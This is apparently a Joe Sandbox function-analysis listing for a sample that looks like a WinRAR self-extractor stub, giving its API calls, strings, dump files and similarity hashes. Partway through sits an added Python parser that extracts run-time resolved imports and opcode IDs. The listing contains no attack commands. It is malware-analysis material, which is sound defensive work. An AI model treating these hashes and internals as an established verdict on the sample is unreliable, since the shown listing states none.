                                                              • Opcode Fuzzy Hash: a4198f0014e5bac8a0d22ecc01612fa4a61f31e1ea99470088d9fc9212309bd6
                                                              • Instruction Fuzzy Hash: C8E01231942721B7D3615F61BC0EB8F3F54AB07F53F014629FA05AA1D4EFB486008BAA
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: .lnk$dC
                                                              • API String ID: 2691759472-1253457154
                                                              • Opcode ID: 5656ac8ae116ee8ee0a9a7b4bb495613b0bb63cd8d9278f530a17dd0d73e1c3e
                                                              • Instruction ID: 9b1f5087b5fd64da9f95ab37d24ff3280083fa8ba6b0271ab09f2aae13c88a3e
                                                              • Opcode Fuzzy Hash: 5656ac8ae116ee8ee0a9a7b4bb495613b0bb63cd8d9278f530a17dd0d73e1c3e
                                                              • Instruction Fuzzy Hash: 10A15E72D001299ADF24DBA0DD45EFB73FCAF48304F0895E7B509E3141EE789A858B69
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004275E3
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 0042A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0042777F
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: 8a9d3b979d4c2a3d87abce2751f1265e6c65dfe5770f9a3cf82350c6ceeb11a0
                                                              • Instruction ID: 2c275ec2eb6e112676c14a7489795bd92feb39e8ab79a4a2394ec3927ca9be72
                                                              • Opcode Fuzzy Hash: 8a9d3b979d4c2a3d87abce2751f1265e6c65dfe5770f9a3cf82350c6ceeb11a0
                                                              • Instruction Fuzzy Hash: 7541B471A00128AAEB21EB61DC55EDFB37CAF45304F8040DBB605A2192DB785F85CF69
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: 85bb34213e1ea3a1cb2b06d73c0ff982b84e6fa9fc987e829ddeecd777c28be0
                                                              • Instruction ID: 4b49861ad48eb75fde978ceaf3bdd805ed286fc076e18cd7fdf4c7e4dc150822
                                                              • Opcode Fuzzy Hash: 85bb34213e1ea3a1cb2b06d73c0ff982b84e6fa9fc987e829ddeecd777c28be0
                                                              • Instruction Fuzzy Hash: CA3135227042319A8A30FA01B98267B63E4DFA0B54BD4811FFD8443243E76D8D4293EA
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 810b37d6c5f0ff79d115bb5f193bd02c204e607a57a4f70bcfae3ffc079abdfc
                                                              • Instruction ID: 52b36ee8bb9ce7225736109d2b71fa1bb5fecaa19fd7d4d3abf09f497cfc0573
                                                              • Opcode Fuzzy Hash: 810b37d6c5f0ff79d115bb5f193bd02c204e607a57a4f70bcfae3ffc079abdfc
                                                              • Instruction Fuzzy Hash: 4621FF329053066ADB31EA65D841B6FB3DCDF98718F10142FF68082241EB6C9D4886EA
                                                              APIs
                                                                • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0042F2E4
                                                                • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(004681C8,CryptUnprotectMemory), ref: 0042F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0042F33E), ref: 0042F3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 0042F389
                                                              • CryptUnprotectMemory failed, xrefs: 0042F3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 909584f335eba4d6cc40e0e8ce2011f95b6aa2c659d32ff916a6221232cfe037
                                                              • Instruction ID: 3a71e6adf2ce6cbae21935ae1323154ba7e467451e085b3c1905aae03d91ce24
                                                              • Opcode Fuzzy Hash: 909584f335eba4d6cc40e0e8ce2011f95b6aa2c659d32ff916a6221232cfe037
                                                              • Instruction Fuzzy Hash: F5112431700238ABDF21AF21E80166E3764FF05761B90427BFC019B351DA7C9D05869D
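The per-function records in this listing (API list, strings, memory-dump sources and the Similarity identifiers) follow one fixed layout, which makes them easy to mine in bulk: for instance to pull out every export name the sample resolves at run time through GetProcAddress, as the subcall at 0042F2C5 does for CryptProtectMemory and CryptUnprotectMemory (names that never show up in the static import table), or to collect Opcode IDs and intersect them with a second listing to find functions shared between two samples. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it assumes the listing has been saved as plain text with the "Download File" link labels removed, and its embedded sample input is constructed from two records on this page.

```python
# Parse Joe Sandbox function-analysis records (the layout used in this report)
# and mine them for run-time resolved imports. Added example, not Joe Sandbox code.
import re
from dataclasses import dataclass, field

# "Func.MODULE(args), ref: ADDR" or "_wcslen.LIBCMT ref: ADDR", with an optional
# "Part of subcall function X:" prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xref>[0-9A-F]+)\s*$")
HEX_OR_UNKNOWN = re.compile(r"^(?:[0-9A-F]{8}|\?)$")  # address-like or unresolved argument
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # dicts: caller, func, module, args, ref
    strings: list = field(default_factory=list)     # (text, xref address)
    dumps: list = field(default_factory=list)       # memory dump file names
    similarity: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, ...
    snapshot: str = ""


def parse_listing(text: str) -> list:
    """Split the listing into FunctionRecords; each record starts at an 'APIs' heading."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif rec is None or not line.startswith("•"):
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            d = m.groupdict()
            d["args"] = [a.strip() for a in d["args"].split(",")] if d["args"] else []
            rec.apis.append(d)
        elif section == "Strings" and (m := STRING_RE.match(line)):
            rec.strings.append((m["text"], m["xref"]))
        elif section == "Memory Dump Source":
            # "Source File: NAME, Offset: ..., based on PE: ..." or "Associated: NAME"
            rec.dumps.append(line[1:].strip().split(": ", 1)[1].split(",")[0])
        elif section == "Joe Sandbox IDA Plugin":
            rec.snapshot = line[1:].strip().split(": ", 1)[1]
        elif section == "Similarity":
            key, _, value = line[1:].strip().partition(": ")
            rec.similarity[key] = value
    return records


def dynamically_resolved_apis(records: list) -> list:
    """(export name, call site) for every name passed to GetProcAddress: imports
    absent from the PE import table, so a static import scan misses them."""
    found = []
    for rec in records:
        for api in rec.apis:
            if api["func"] == "GetProcAddress":
                for arg in api["args"]:
                    if not HEX_OR_UNKNOWN.match(arg):
                        found.append((arg, api["ref"]))
    return found


def opcode_ids(records: list) -> set:
    """Opcode IDs of all records; intersect two listings to find shared functions."""
    return {r.similarity["Opcode ID"] for r in records if "Opcode ID" in r.similarity}


# Constructed input: two records copied from this report, "Download File" labels removed.
SAMPLE = """\
APIs
  • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0042F2E4
  • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(004681C8,CryptUnprotectMemory), ref: 0042F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0042F33E), ref: 0042F3D2
Strings
• CryptProtectMemory failed, xrefs: 0042F389
• CryptUnprotectMemory failed, xrefs: 0042F3CA
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: 909584f335eba4d6cc40e0e8ce2011f95b6aa2c659d32ff916a6221232cfe037
APIs
Strings
Similarity
• API ID: _wcschr
• String ID: *
• Opcode ID: 85bb34213e1ea3a1cb2b06d73c0ff982b84e6fa9fc987e829ddeecd777c28be0
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    print(f"{len(recs)} records, {len(opcode_ids(recs))} opcode IDs")
    for name, site in dynamically_resolved_apis(recs):
        print(f"GetProcAddress -> {name} at {site}")
```

Run it against the full listing saved from the report (one record per "APIs" heading) to get the complete set of run-time resolved names; the Opcode ID set is what you would intersect with the listing of a known-clean WinRAR SFX stub to separate the archive stub's own functions from anything the packer added.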
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00431160,?,00000000,00000000), ref: 00431043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0043108A
                                                                • Part of subcall function 00426C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00426C54
                                                                • Part of subcall function 00426DCB: _wcschr.LIBVCRUNTIME ref: 00426E0A
                                                                • Part of subcall function 00426DCB: _wcschr.LIBVCRUNTIME ref: 00426E19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2706921342-3849766595
                                                              • Opcode ID: fceeae7b0e377fe1741550a06bd753862cc722493d84b073acea579b37f46f79
                                                              • Instruction ID: ae02e0e7e36dbd11e7979ddddce13518e00c6ad904b3f3ebb4bc1310d83ce720
                                                              • Opcode Fuzzy Hash: fceeae7b0e377fe1741550a06bd753862cc722493d84b073acea579b37f46f79
                                                              • Instruction Fuzzy Hash: 00014E753003096FD7346F24AC41B76B368EB44751F20142FFB46526E1DEA4AC84422C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: <9E$?*<>|"
                                                              • API String ID: 2691759472-4125611791
                                                              • Opcode ID: 33df98e2ada5b9d555d0330d9b67d59bc73022a607effa42922389a5d58b2d2d
                                                              • Instruction ID: 88574ecc51c8f82c5c7e7e884e6be23178cc5f649ac4736f40622d3b2045bb21
                                                              • Opcode Fuzzy Hash: 33df98e2ada5b9d555d0330d9b67d59bc73022a607effa42922389a5d58b2d2d
                                                              • Instruction Fuzzy Hash: BDF0D153B45321C1C7301EA9B88173BB3E4EF95720FB4081FE5C8873C2E6A988C082AD
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: Software\WinRAR SFX$C
                                                              • API String ID: 176396367-1432986629
                                                              • Opcode ID: aac71e1c8e7a6136af646ce862451e13ac45d1a82587d03c345f652b219e5d40
                                                              • Instruction ID: 7f7936cd8acaa6f25d66e4768d556975a37852d77616627f4e23de06a3aca46f
                                                              • Opcode Fuzzy Hash: aac71e1c8e7a6136af646ce862451e13ac45d1a82587d03c345f652b219e5d40
                                                              • Instruction Fuzzy Hash: CD01B131800118BAEB219F51DC0AFDF7F7CEB09795F000066F509A00A0DBB49A98CBA5
                                                              APIs
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00431FE5
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00431FF6
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00432006
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00432014
                                                                • Part of subcall function 00431FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0042B371,?,?,00000000,?,?,?), ref: 0043202F
                                                                • Part of subcall function 0043AC04: SetCurrentDirectoryW.KERNELBASE(?,0043AE72,C:\Users\user\Desktop,00000000,0046946A,00000006), ref: 0043AC08
                                                              • _wcslen.LIBCMT ref: 0043AE8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryString
                                                              • String ID: <C$C:\Users\user\Desktop
                                                              • API String ID: 521417927-578235079
                                                              • Opcode ID: cf969c2a0484dc8e3e42e6c4258439afc56deda6ef55fac81085564429a32498
                                                              • Instruction ID: d78cfffb0cc559192a624c742f5ce6d810ef219264111bcacb70e1f4b0aed337
                                                              • Opcode Fuzzy Hash: cf969c2a0484dc8e3e42e6c4258439afc56deda6ef55fac81085564429a32498
                                                              • Instruction Fuzzy Hash: AB015271D4021895DF10ABA5DD0AEDF73BCAF0C705F00146BF545E3191EBB896548AAA
                                                              APIs
                                                                • Part of subcall function 004497E5: GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                                • Part of subcall function 004497E5: _free.LIBCMT ref: 0044981C
                                                                • Part of subcall function 004497E5: SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                                • Part of subcall function 004497E5: _abort.LIBCMT ref: 00449863
                                                              • _abort.LIBCMT ref: 0044BB80
                                                              • _free.LIBCMT ref: 0044BBB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: pE
                                                              • API String ID: 289325740-674470523
                                                              • Opcode ID: e01bd2c71deaf8f7c1c8e226d4e210c709adedbda5e9b55cd93c01009fce8ce5
                                                              • Instruction ID: 553a0a398e34879d2bfe07e019a3c2fa9af326f7037b7957623a2c1696f25476
                                                              • Opcode Fuzzy Hash: e01bd2c71deaf8f7c1c8e226d4e210c709adedbda5e9b55cd93c01009fce8ce5
                                                              • Instruction Fuzzy Hash: C001A531D01B61DBEB269F5A840261EB761FB04725B14011FE96467B92CB2CBE018BCD
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (C$ZC
                                                              • API String ID: 2696272793-784503434
                                                              • Opcode ID: 5735515104e6a4ff6b86255d70329cb916e3d1bb6081ae29a56ce2e84cdb1991
                                                              • Instruction ID: dfb42b45ff1b072af0bb12a1f5b7a72f459752002146aacd766500b1c91f562b
                                                              • Opcode Fuzzy Hash: 5735515104e6a4ff6b86255d70329cb916e3d1bb6081ae29a56ce2e84cdb1991
                                                              • Instruction Fuzzy Hash: C4016D76600118FF9F059FB0DD49CEE7B6DEF19345B100569B906D7120E731AA44DBA4
                                                              APIs
                                                                • Part of subcall function 0044BF30: GetEnvironmentStringsW.KERNEL32 ref: 0044BF39
                                                                • Part of subcall function 0044BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BF5C
                                                                • Part of subcall function 0044BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044BF82
                                                                • Part of subcall function 0044BF30: _free.LIBCMT ref: 0044BF95
                                                                • Part of subcall function 0044BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044BFA4
                                                              • _free.LIBCMT ref: 004482AE
                                                              • _free.LIBCMT ref: 004482B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID: 0"H
                                                              • API String ID: 400815659-77574912
                                                              • Opcode ID: 7cbb94571088ec023225236bfb2cb3baa21554ea5ef62be5f5f915812dc94d30
                                                              • Instruction ID: 0c2c2c6c35c6528180ee8fb316837fa7caecc3d931468e76613a0b2c114fb87e
                                                              • Opcode Fuzzy Hash: 7cbb94571088ec023225236bfb2cb3baa21554ea5ef62be5f5f915812dc94d30
                                                              • Instruction Fuzzy Hash: ABE0A932A06E4251B261327B2C0662F06409B9133CB1406AFFA209B1D3CE9C880306AF
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00431206,?), ref: 00430FEA
                                                              • GetLastError.KERNEL32(?), ref: 00430FF6
                                                                • Part of subcall function 00426C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00426C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00430FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 3becd15e5fad7f75d85581e793ea1598b820e63eac5668c15b2855409c02438c
                                                              • Instruction ID: 86a080f4f78456e3880e74c211af415d8a66d5bc3f63d79bc82a55a98e0e0a75
                                                              • Opcode Fuzzy Hash: 3becd15e5fad7f75d85581e793ea1598b820e63eac5668c15b2855409c02438c
                                                              • Instruction Fuzzy Hash: 3ED02B3160833036C62037296C06D6F78048B11737FA1072AF538546F7CB1C4991529E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0042DA55,?), ref: 0042E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0042DA55,?), ref: 0042E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
